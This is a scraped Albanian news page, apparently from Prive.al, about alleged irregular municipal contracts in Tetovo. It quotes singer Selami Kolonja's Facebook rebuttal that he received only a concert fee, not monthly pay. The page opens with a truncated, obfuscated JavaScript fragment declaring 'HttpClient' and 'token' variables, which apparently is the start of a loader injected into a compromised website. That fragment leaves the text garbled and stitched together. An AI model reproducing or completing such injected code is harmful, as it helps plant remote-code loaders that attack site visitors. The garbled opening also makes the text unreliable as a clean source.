;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mori rrogë mujore nga Komuna e Tetovës? Reagon këngëtari shqiptar

By

Një skandal ka shpërthyer në komunën e Tetovës, ku ish kryetarja e komunës ka dhënë kontrata shumë personave që nuk kanë dhënë kontribut në komunë të Tetovës.

Nuk dihet ende pse gjithë ata kontrata ka dhënë ish kryetarja e Tetovës Teuta Arifi ku sipas kryetarit aktual Bilall Kasami janë mbi 400 kontrata në vepër.

Edhe pse sot janë publikuar 811 kontra në faktë ata janë 400 pasi janë kontrata gjashtë mujore dhe janë publikuar dy herë i njeti emër.

Në mesin e 400 kontratave në vepër shihen shumë emra që dyshohen se çka kanë dhënë për komunën e Tetovës që kanë marrë aq shumë para.

Një emër jo pak i njohur u pretendua se është Selami Kolonja profesor në Universitetin e Tetovës dhe këngëtar nga Struga ka marrë nga komuna e Tetovës 30 mijë denarë çdo muaj bashkë me disa persona të tjerë që mbajnë të njëjtin mbiemër.

Sipas pretendimeve, nëse Selami Kolonja ka pasur kontratë 12 muaj bashkë me tre të tjerët i bie që Selami Kolonja ka marrë nga komuna e Tetovës 12 muaj nga 30 mijë denarë bëjnë 360 mijë denarë vetëm Selami Kolonja.

Së fundmi, këngëtari tetorvar ka reaguar me anë të një postimi të gjatë në profilin e tij në Facebook.

Lexoni të plotë më poshtë. /Prive.al

“Të nderuar ,kohëve të fundit nëpër portale dhe nga njerëz dashakeq të zhytur në politikë me pretendime dhe pa kod etik e moral ,të pa informuar saktë , është lakuar emri im se gjoja unë dhe familja ime paskemi marrë rroga mujore nga Komuna e Tetovës për ndonjë aktivitet të imagjinuar !

Kjo është e pa vërtetë dhe e vërteta qëndron krejtësisht ndryshe !

Për një mega koncert me krijimtarinë time artistike ( 19 06.2021 live )që unë dhe ekipi im në javën kulturore Tetovare i ofruam publikut,ne morëm nga Komuna honorarin modest që ishim dakordësuar, gjë që shum leht zbulohet nga listat që po qarkullojnë ! Për tua hequr merakun ,honorari që kemi marrë ka qënë më i vogël se një këngëtar (e) që merr nëpër dasma ( solo pa orkestër ) pra 3000 euro,gjë që lehtë mund të dëshmohet nga historiku i të hyrave bankare ose parave të destinuara nga Komuna !

Andaj ju “gazetarë” portalesh bëni mirë që lajmin fillimisht hulumtoni, ta verifikoni e mandej ta publikoni !

Nuk është profesionale as etike as morale të publikosh lajm me hamendje !

Për gjith këtë që thash më lartë jam gatshëm të dëshmoj jo vetëm përpara organeve të drejtësisë , por edhe para Zotit!

Me respekt Selami Kolonja”

Artikuj të ngjashëm